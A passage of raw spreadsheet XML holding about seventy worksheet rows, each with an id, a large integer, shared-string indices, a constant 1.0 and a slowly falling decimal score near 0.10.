    <row r="15539" ht="15.75" customHeight="1">
      <c r="A15539" s="1">
        <v>2487.0</v>
      </c>
      <c r="B15539" s="2">
        <v>3.3879377E7</v>
      </c>
      <c r="C15539" s="2" t="s">
        <v>14992</v>
      </c>
      <c r="D15539" s="2">
        <v>1.0</v>
      </c>
      <c r="E15539" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15539" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="15540" ht="15.75" customHeight="1">
      <c r="A15540" s="1">
        <v>3439.0</v>
      </c>
      <c r="B15540" s="2">
        <v>3.8219513E7</v>
      </c>
      <c r="C15540" s="2" t="s">
        <v>14993</v>
      </c>
      <c r="D15540" s="2">
        <v>1.0</v>
      </c>
      <c r="E15540" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15540" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="15541" ht="15.75" customHeight="1">
      <c r="A15541" s="1">
        <v>15223.0</v>
      </c>
      <c r="B15541" s="2">
        <v>4.2180887E7</v>
      </c>
      <c r="C15541" s="2" t="s">
        <v>14994</v>
      </c>
      <c r="D15541" s="2">
        <v>1.0</v>
      </c>
      <c r="E15541" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15541" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="15542" ht="15.75" customHeight="1">
      <c r="A15542" s="1">
        <v>17414.0</v>
      </c>
      <c r="B15542" s="2">
        <v>4.9686212E7</v>
      </c>
      <c r="C15542" s="2" t="s">
        <v>14995</v>
      </c>
      <c r="D15542" s="2">
        <v>1.0</v>
      </c>
      <c r="E15542" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15542" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="15543" ht="15.75" customHeight="1">
      <c r="A15543" s="1">
        <v>21691.0</v>
      </c>
      <c r="B15543" s="2">
        <v>2.5220668E7</v>
      </c>
      <c r="C15543" s="2" t="s">
        <v>14996</v>
      </c>
      <c r="D15543" s="2">
        <v>1.0</v>
      </c>
      <c r="E15543" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15543" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="15544" ht="15.75" customHeight="1">
      <c r="A15544" s="1">
        <v>8274.0</v>
      </c>
      <c r="B15544" s="2">
        <v>5.3459749E7</v>
      </c>
      <c r="C15544" s="2" t="s">
        <v>14997</v>
      </c>
      <c r="D15544" s="2">
        <v>1.0</v>
      </c>
      <c r="E15544" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15544" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="15545" ht="15.75" customHeight="1">
      <c r="A15545" s="1">
        <v>9886.0</v>
      </c>
      <c r="B15545" s="2">
        <v>5.6751035E7</v>
      </c>
      <c r="C15545" s="2" t="s">
        <v>14998</v>
      </c>
      <c r="D15545" s="2">
        <v>1.0</v>
      </c>
      <c r="E15545" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15545" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="15546" ht="15.75" customHeight="1">
      <c r="A15546" s="1">
        <v>20137.0</v>
      </c>
      <c r="B15546" s="2">
        <v>1.0104057E7</v>
      </c>
      <c r="C15546" s="2" t="s">
        <v>14999</v>
      </c>
      <c r="D15546" s="2">
        <v>1.0</v>
      </c>
      <c r="E15546" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15546" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="15547" ht="15.75" customHeight="1">
      <c r="A15547" s="1">
        <v>23883.0</v>
      </c>
      <c r="B15547" s="2">
        <v>8398851.0</v>
      </c>
      <c r="C15547" s="2" t="s">
        <v>15000</v>
      </c>
      <c r="D15547" s="2">
        <v>1.0</v>
      </c>
      <c r="E15547" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15547" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="15548" ht="15.75" customHeight="1">
      <c r="A15548" s="1">
        <v>26718.0</v>
      </c>
      <c r="B15548" s="2">
        <v>1.8232683E7</v>
      </c>
      <c r="C15548" s="2" t="s">
        <v>15001</v>
      </c>
      <c r="D15548" s="2">
        <v>1.0</v>
      </c>
      <c r="E15548" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15548" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="15549" ht="15.75" customHeight="1">
      <c r="A15549" s="1">
        <v>27735.0</v>
      </c>
      <c r="B15549" s="2">
        <v>2.3080437E7</v>
      </c>
      <c r="C15549" s="2" t="s">
        <v>14925</v>
      </c>
      <c r="D15549" s="2">
        <v>1.0</v>
      </c>
      <c r="E15549" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15549" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="15550" ht="15.75" customHeight="1">
      <c r="A15550" s="1">
        <v>4824.0</v>
      </c>
      <c r="B15550" s="2">
        <v>4.3625384E7</v>
      </c>
      <c r="C15550" s="2" t="s">
        <v>15002</v>
      </c>
      <c r="D15550" s="2">
        <v>1.0</v>
      </c>
      <c r="E15550" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15550" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="15551" ht="15.75" customHeight="1">
      <c r="A15551" s="1">
        <v>7656.0</v>
      </c>
      <c r="B15551" s="2">
        <v>5.1798337E7</v>
      </c>
      <c r="C15551" s="2" t="s">
        <v>15003</v>
      </c>
      <c r="D15551" s="2">
        <v>1.0</v>
      </c>
      <c r="E15551" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15551" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="15552" ht="15.75" customHeight="1">
      <c r="A15552" s="1">
        <v>11631.0</v>
      </c>
      <c r="B15552" s="2">
        <v>2.3165502E7</v>
      </c>
      <c r="C15552" s="2" t="s">
        <v>15004</v>
      </c>
      <c r="D15552" s="2">
        <v>1.0</v>
      </c>
      <c r="E15552" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15552" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="15553" ht="15.75" customHeight="1">
      <c r="A15553" s="1">
        <v>20645.0</v>
      </c>
      <c r="B15553" s="2">
        <v>1.4238566E7</v>
      </c>
      <c r="C15553" s="2" t="s">
        <v>15005</v>
      </c>
      <c r="D15553" s="2">
        <v>1.0</v>
      </c>
      <c r="E15553" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15553" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="15554" ht="15.75" customHeight="1">
      <c r="A15554" s="1">
        <v>4235.0</v>
      </c>
      <c r="B15554" s="2">
        <v>4.1787731E7</v>
      </c>
      <c r="C15554" s="2" t="s">
        <v>15006</v>
      </c>
      <c r="D15554" s="2">
        <v>1.0</v>
      </c>
      <c r="E15554" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15554" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15555" ht="15.75" customHeight="1">
      <c r="A15555" s="1">
        <v>4460.0</v>
      </c>
      <c r="B15555" s="2">
        <v>4.2437706E7</v>
      </c>
      <c r="C15555" s="2" t="s">
        <v>15007</v>
      </c>
      <c r="D15555" s="2">
        <v>1.0</v>
      </c>
      <c r="E15555" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15555" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15556" ht="15.75" customHeight="1">
      <c r="A15556" s="1">
        <v>10426.0</v>
      </c>
      <c r="B15556" s="2">
        <v>1.0331374E7</v>
      </c>
      <c r="C15556" s="2" t="s">
        <v>15008</v>
      </c>
      <c r="D15556" s="2">
        <v>1.0</v>
      </c>
      <c r="E15556" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15556" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15557" ht="15.75" customHeight="1">
      <c r="A15557" s="1">
        <v>12748.0</v>
      </c>
      <c r="B15557" s="2">
        <v>3.1106048E7</v>
      </c>
      <c r="C15557" s="2" t="s">
        <v>15009</v>
      </c>
      <c r="D15557" s="2">
        <v>1.0</v>
      </c>
      <c r="E15557" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15557" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15558" ht="15.75" customHeight="1">
      <c r="A15558" s="1">
        <v>14583.0</v>
      </c>
      <c r="B15558" s="2">
        <v>4.0133332E7</v>
      </c>
      <c r="C15558" s="2" t="s">
        <v>15010</v>
      </c>
      <c r="D15558" s="2">
        <v>1.0</v>
      </c>
      <c r="E15558" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15558" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15559" ht="15.75" customHeight="1">
      <c r="A15559" s="1">
        <v>19351.0</v>
      </c>
      <c r="B15559" s="2">
        <v>5.5390801E7</v>
      </c>
      <c r="C15559" s="2" t="s">
        <v>15011</v>
      </c>
      <c r="D15559" s="2">
        <v>1.0</v>
      </c>
      <c r="E15559" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15559" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15560" ht="15.75" customHeight="1">
      <c r="A15560" s="1">
        <v>20869.0</v>
      </c>
      <c r="B15560" s="2">
        <v>1.592839E7</v>
      </c>
      <c r="C15560" s="2" t="s">
        <v>15012</v>
      </c>
      <c r="D15560" s="2">
        <v>1.0</v>
      </c>
      <c r="E15560" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15560" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15561" ht="15.75" customHeight="1">
      <c r="A15561" s="1">
        <v>29828.0</v>
      </c>
      <c r="B15561" s="2">
        <v>3.532452E7</v>
      </c>
      <c r="C15561" s="2" t="s">
        <v>15013</v>
      </c>
      <c r="D15561" s="2">
        <v>1.0</v>
      </c>
      <c r="E15561" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15561" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15562" ht="15.75" customHeight="1">
      <c r="A15562" s="1">
        <v>30009.0</v>
      </c>
      <c r="B15562" s="2">
        <v>3.6153369E7</v>
      </c>
      <c r="C15562" s="2" t="s">
        <v>15014</v>
      </c>
      <c r="D15562" s="2">
        <v>1.0</v>
      </c>
      <c r="E15562" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15562" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15563" ht="15.75" customHeight="1">
      <c r="A15563" s="1">
        <v>30979.0</v>
      </c>
      <c r="B15563" s="2">
        <v>4.7524183E7</v>
      </c>
      <c r="C15563" s="2" t="s">
        <v>15015</v>
      </c>
      <c r="D15563" s="2">
        <v>1.0</v>
      </c>
      <c r="E15563" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15563" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15564" ht="15.75" customHeight="1">
      <c r="A15564" s="1">
        <v>32003.0</v>
      </c>
      <c r="B15564" s="2">
        <v>5.3425744E7</v>
      </c>
      <c r="C15564" s="2" t="s">
        <v>15016</v>
      </c>
      <c r="D15564" s="2">
        <v>1.0</v>
      </c>
      <c r="E15564" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15564" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="15565" ht="15.75" customHeight="1">
      <c r="A15565" s="1">
        <v>1044.0</v>
      </c>
      <c r="B15565" s="2">
        <v>2.3342699E7</v>
      </c>
      <c r="C15565" s="2" t="s">
        <v>15017</v>
      </c>
      <c r="D15565" s="2">
        <v>1.0</v>
      </c>
      <c r="E15565" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15565" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15566" ht="15.75" customHeight="1">
      <c r="A15566" s="1">
        <v>6427.0</v>
      </c>
      <c r="B15566" s="2">
        <v>4.8557666E7</v>
      </c>
      <c r="C15566" s="2" t="s">
        <v>15018</v>
      </c>
      <c r="D15566" s="2">
        <v>1.0</v>
      </c>
      <c r="E15566" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15566" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15567" ht="15.75" customHeight="1">
      <c r="A15567" s="1">
        <v>10674.0</v>
      </c>
      <c r="B15567" s="2">
        <v>1.453134E7</v>
      </c>
      <c r="C15567" s="2" t="s">
        <v>15019</v>
      </c>
      <c r="D15567" s="2">
        <v>1.0</v>
      </c>
      <c r="E15567" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15567" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15568" ht="15.75" customHeight="1">
      <c r="A15568" s="1">
        <v>17347.0</v>
      </c>
      <c r="B15568" s="2">
        <v>4.9411921E7</v>
      </c>
      <c r="C15568" s="2" t="s">
        <v>15020</v>
      </c>
      <c r="D15568" s="2">
        <v>1.0</v>
      </c>
      <c r="E15568" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15568" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15569" ht="15.75" customHeight="1">
      <c r="A15569" s="1">
        <v>17367.0</v>
      </c>
      <c r="B15569" s="2">
        <v>4.9501234E7</v>
      </c>
      <c r="C15569" s="2" t="s">
        <v>15021</v>
      </c>
      <c r="D15569" s="2">
        <v>1.0</v>
      </c>
      <c r="E15569" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15569" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15570" ht="15.75" customHeight="1">
      <c r="A15570" s="1">
        <v>17484.0</v>
      </c>
      <c r="B15570" s="2">
        <v>4.9952696E7</v>
      </c>
      <c r="C15570" s="2" t="s">
        <v>15022</v>
      </c>
      <c r="D15570" s="2">
        <v>1.0</v>
      </c>
      <c r="E15570" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15570" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15571" ht="15.75" customHeight="1">
      <c r="A15571" s="1">
        <v>17565.0</v>
      </c>
      <c r="B15571" s="2">
        <v>5.0245676E7</v>
      </c>
      <c r="C15571" s="2" t="s">
        <v>15023</v>
      </c>
      <c r="D15571" s="2">
        <v>1.0</v>
      </c>
      <c r="E15571" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15571" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15572" ht="15.75" customHeight="1">
      <c r="A15572" s="1">
        <v>20802.0</v>
      </c>
      <c r="B15572" s="2">
        <v>1.5280209E7</v>
      </c>
      <c r="C15572" s="2" t="s">
        <v>15024</v>
      </c>
      <c r="D15572" s="2">
        <v>1.0</v>
      </c>
      <c r="E15572" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15572" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15573" ht="15.75" customHeight="1">
      <c r="A15573" s="1">
        <v>26241.0</v>
      </c>
      <c r="B15573" s="2">
        <v>1.6288174E7</v>
      </c>
      <c r="C15573" s="2" t="s">
        <v>15025</v>
      </c>
      <c r="D15573" s="2">
        <v>1.0</v>
      </c>
      <c r="E15573" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15573" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15574" ht="15.75" customHeight="1">
      <c r="A15574" s="1">
        <v>26771.0</v>
      </c>
      <c r="B15574" s="2">
        <v>1.8488898E7</v>
      </c>
      <c r="C15574" s="2" t="s">
        <v>15026</v>
      </c>
      <c r="D15574" s="2">
        <v>1.0</v>
      </c>
      <c r="E15574" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15574" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="15575" ht="15.75" customHeight="1">
      <c r="A15575" s="1">
        <v>11159.0</v>
      </c>
      <c r="B15575" s="2">
        <v>1.9503567E7</v>
      </c>
      <c r="C15575" s="2" t="s">
        <v>15027</v>
      </c>
      <c r="D15575" s="2">
        <v>1.0</v>
      </c>
      <c r="E15575" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15575" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="15576" ht="15.75" customHeight="1">
      <c r="A15576" s="1">
        <v>12277.0</v>
      </c>
      <c r="B15576" s="2">
        <v>2.8158663E7</v>
      </c>
      <c r="C15576" s="2" t="s">
        <v>15028</v>
      </c>
      <c r="D15576" s="2">
        <v>1.0</v>
      </c>
      <c r="E15576" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15576" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="15577" ht="15.75" customHeight="1">
      <c r="A15577" s="1">
        <v>13029.0</v>
      </c>
      <c r="B15577" s="2">
        <v>3.2948392E7</v>
      </c>
      <c r="C15577" s="2" t="s">
        <v>15029</v>
      </c>
      <c r="D15577" s="2">
        <v>1.0</v>
      </c>
      <c r="E15577" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15577" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="15578" ht="15.75" customHeight="1">
      <c r="A15578" s="1">
        <v>15509.0</v>
      </c>
      <c r="B15578" s="2">
        <v>4.3248811E7</v>
      </c>
      <c r="C15578" s="2" t="s">
        <v>15030</v>
      </c>
      <c r="D15578" s="2">
        <v>1.0</v>
      </c>
      <c r="E15578" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15578" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="15579" ht="15.75" customHeight="1">
      <c r="A15579" s="1">
        <v>24005.0</v>
      </c>
      <c r="B15579" s="2">
        <v>9266281.0</v>
      </c>
      <c r="C15579" s="2" t="s">
        <v>14814</v>
      </c>
      <c r="D15579" s="2">
        <v>1.0</v>
      </c>
      <c r="E15579" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15579" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="15580" ht="15.75" customHeight="1">
      <c r="A15580" s="1">
        <v>3778.0</v>
      </c>
      <c r="B15580" s="2">
        <v>3.9908068E7</v>
      </c>
      <c r="C15580" s="2" t="s">
        <v>15031</v>
      </c>
      <c r="D15580" s="2">
        <v>1.0</v>
      </c>
      <c r="E15580" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15580" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="15581" ht="15.75" customHeight="1">
      <c r="A15581" s="1">
        <v>4337.0</v>
      </c>
      <c r="B15581" s="2">
        <v>4.2064188E7</v>
      </c>
      <c r="C15581" s="2" t="s">
        <v>15032</v>
      </c>
      <c r="D15581" s="2">
        <v>1.0</v>
      </c>
      <c r="E15581" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15581" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="15582" ht="15.75" customHeight="1">
      <c r="A15582" s="1">
        <v>7423.0</v>
      </c>
      <c r="B15582" s="2">
        <v>5.1160155E7</v>
      </c>
      <c r="C15582" s="2" t="s">
        <v>15033</v>
      </c>
      <c r="D15582" s="2">
        <v>1.0</v>
      </c>
      <c r="E15582" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15582" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="15583" ht="15.75" customHeight="1">
      <c r="A15583" s="1">
        <v>9104.0</v>
      </c>
      <c r="B15583" s="2">
        <v>5.5165803E7</v>
      </c>
      <c r="C15583" s="2" t="s">
        <v>15034</v>
      </c>
      <c r="D15583" s="2">
        <v>1.0</v>
      </c>
      <c r="E15583" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15583" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="15584" ht="15.75" customHeight="1">
      <c r="A15584" s="1">
        <v>16199.0</v>
      </c>
      <c r="B15584" s="2">
        <v>4.5664451E7</v>
      </c>
      <c r="C15584" s="2" t="s">
        <v>15035</v>
      </c>
      <c r="D15584" s="2">
        <v>1.0</v>
      </c>
      <c r="E15584" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15584" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="15585" ht="15.75" customHeight="1">
      <c r="A15585" s="1">
        <v>17905.0</v>
      </c>
      <c r="B15585" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C15585" s="2" t="s">
        <v>15036</v>
      </c>
      <c r="D15585" s="2">
        <v>1.0</v>
      </c>
      <c r="E15585" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15585" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="15586" ht="15.75" customHeight="1">
      <c r="A15586" s="1">
        <v>19044.0</v>
      </c>
      <c r="B15586" s="2">
        <v>5.4569317E7</v>
      </c>
      <c r="C15586" s="2" t="s">
        <v>15037</v>
      </c>
      <c r="D15586" s="2">
        <v>1.0</v>
      </c>
      <c r="E15586" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15586" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="15587" ht="15.75" customHeight="1">
      <c r="A15587" s="1">
        <v>20600.0</v>
      </c>
      <c r="B15587" s="2">
        <v>1.3867576E7</v>
      </c>
      <c r="C15587" s="2" t="s">
        <v>15038</v>
      </c>
      <c r="D15587" s="2">
        <v>1.0</v>
      </c>
      <c r="E15587" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15587" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="15588" ht="15.75" customHeight="1">
      <c r="A15588" s="1">
        <v>27842.0</v>
      </c>
      <c r="B15588" s="2">
        <v>2.3421611E7</v>
      </c>
      <c r="C15588" s="2" t="s">
        <v>15039</v>
      </c>
      <c r="D15588" s="2">
        <v>1.0</v>
      </c>
      <c r="E15588" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15588" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="15589" ht="15.75" customHeight="1">
      <c r="A15589" s="1">
        <v>2154.0</v>
      </c>
      <c r="B15589" s="2">
        <v>3.1640922E7</v>
      </c>
      <c r="C15589" s="2" t="s">
        <v>15040</v>
      </c>
      <c r="D15589" s="2">
        <v>1.0</v>
      </c>
      <c r="E15589" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15589" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="15590" ht="15.75" customHeight="1">
      <c r="A15590" s="1">
        <v>5413.0</v>
      </c>
      <c r="B15590" s="2">
        <v>4.5524814E7</v>
      </c>
      <c r="C15590" s="2" t="s">
        <v>15041</v>
      </c>
      <c r="D15590" s="2">
        <v>1.0</v>
      </c>
      <c r="E15590" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15590" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="15591" ht="15.75" customHeight="1">
      <c r="A15591" s="1">
        <v>12214.0</v>
      </c>
      <c r="B15591" s="2">
        <v>2.7650701E7</v>
      </c>
      <c r="C15591" s="2" t="s">
        <v>15042</v>
      </c>
      <c r="D15591" s="2">
        <v>1.0</v>
      </c>
      <c r="E15591" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15591" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="15592" ht="15.75" customHeight="1">
      <c r="A15592" s="1">
        <v>26654.0</v>
      </c>
      <c r="B15592" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C15592" s="2" t="s">
        <v>15043</v>
      </c>
      <c r="D15592" s="2">
        <v>1.0</v>
      </c>
      <c r="E15592" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15592" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="15593" ht="15.75" customHeight="1">
      <c r="A15593" s="1">
        <v>4397.0</v>
      </c>
      <c r="B15593" s="2">
        <v>4.2264358E7</v>
      </c>
      <c r="C15593" s="2" t="s">
        <v>15044</v>
      </c>
      <c r="D15593" s="2">
        <v>1.0</v>
      </c>
      <c r="E15593" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15593" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="15594" ht="15.75" customHeight="1">
      <c r="A15594" s="1">
        <v>5760.0</v>
      </c>
      <c r="B15594" s="2">
        <v>4.6674355E7</v>
      </c>
      <c r="C15594" s="2" t="s">
        <v>15045</v>
      </c>
      <c r="D15594" s="2">
        <v>1.0</v>
      </c>
      <c r="E15594" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15594" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="15595" ht="15.75" customHeight="1">
      <c r="A15595" s="1">
        <v>12200.0</v>
      </c>
      <c r="B15595" s="2">
        <v>2.7500534E7</v>
      </c>
      <c r="C15595" s="2" t="s">
        <v>15046</v>
      </c>
      <c r="D15595" s="2">
        <v>1.0</v>
      </c>
      <c r="E15595" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15595" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="15596" ht="15.75" customHeight="1">
      <c r="A15596" s="1">
        <v>16853.0</v>
      </c>
      <c r="B15596" s="2">
        <v>4.7910396E7</v>
      </c>
      <c r="C15596" s="2" t="s">
        <v>15047</v>
      </c>
      <c r="D15596" s="2">
        <v>1.0</v>
      </c>
      <c r="E15596" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15596" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="15597" ht="15.75" customHeight="1">
      <c r="A15597" s="1">
        <v>19414.0</v>
      </c>
      <c r="B15597" s="2">
        <v>5.5622263E7</v>
      </c>
      <c r="C15597" s="2" t="s">
        <v>15048</v>
      </c>
      <c r="D15597" s="2">
        <v>1.0</v>
      </c>
      <c r="E15597" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15597" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="15598" ht="15.75" customHeight="1">
      <c r="A15598" s="1">
        <v>19818.0</v>
      </c>
      <c r="B15598" s="2">
        <v>5.6957155E7</v>
      </c>
      <c r="C15598" s="2" t="s">
        <v>15049</v>
      </c>
      <c r="D15598" s="2">
        <v>1.0</v>
      </c>
      <c r="E15598" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15598" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="15599" ht="15.75" customHeight="1">
      <c r="A15599" s="1">
        <v>26029.0</v>
      </c>
      <c r="B15599" s="2">
        <v>1.5390379E7</v>
      </c>
      <c r="C15599" s="2" t="s">
        <v>15050</v>
      </c>
      <c r="D15599" s="2">
        <v>1.0</v>
      </c>
      <c r="E15599" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15599" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="15600" ht="15.75" customHeight="1">
      <c r="A15600" s="1">
        <v>12559.0</v>
      </c>
      <c r="B15600" s="2">
        <v>2.9903428E7</v>
      </c>
      <c r="C15600" s="2" t="s">
        <v>15051</v>
      </c>
      <c r="D15600" s="2">
        <v>1.0</v>
      </c>
      <c r="E15600" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15600" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="15601" ht="15.75" customHeight="1">
      <c r="A15601" s="1">
        <v>285.0</v>
      </c>
      <c r="B15601" s="2">
        <v>1.5441938E7</v>
      </c>
      <c r="C15601" s="2" t="s">
        <v>15052</v>
      </c>
      <c r="D15601" s="2">
        <v>1.0</v>
      </c>
      <c r="E15601" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15601" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15602" ht="15.75" customHeight="1">
      <c r="A15602" s="1">
        <v>1374.0</v>
      </c>
      <c r="B15602" s="2">
        <v>2.6030646E7</v>
      </c>
      <c r="C15602" s="2" t="s">
        <v>15053</v>
      </c>
      <c r="D15602" s="2">
        <v>1.0</v>
      </c>
      <c r="E15602" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15602" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15603" ht="15.75" customHeight="1">
      <c r="A15603" s="1">
        <v>1489.0</v>
      </c>
      <c r="B15603" s="2">
        <v>2.7183334E7</v>
      </c>
      <c r="C15603" s="2" t="s">
        <v>15054</v>
      </c>
      <c r="D15603" s="2">
        <v>1.0</v>
      </c>
      <c r="E15603" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15603" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15604" ht="15.75" customHeight="1">
      <c r="A15604" s="1">
        <v>2015.0</v>
      </c>
      <c r="B15604" s="2">
        <v>3.0723414E7</v>
      </c>
      <c r="C15604" s="2" t="s">
        <v>15055</v>
      </c>
      <c r="D15604" s="2">
        <v>1.0</v>
      </c>
      <c r="E15604" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15604" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15605" ht="15.75" customHeight="1">
      <c r="A15605" s="1">
        <v>2092.0</v>
      </c>
      <c r="B15605" s="2">
        <v>3.1266969E7</v>
      </c>
      <c r="C15605" s="2" t="s">
        <v>15056</v>
      </c>
      <c r="D15605" s="2">
        <v>1.0</v>
      </c>
      <c r="E15605" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15605" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
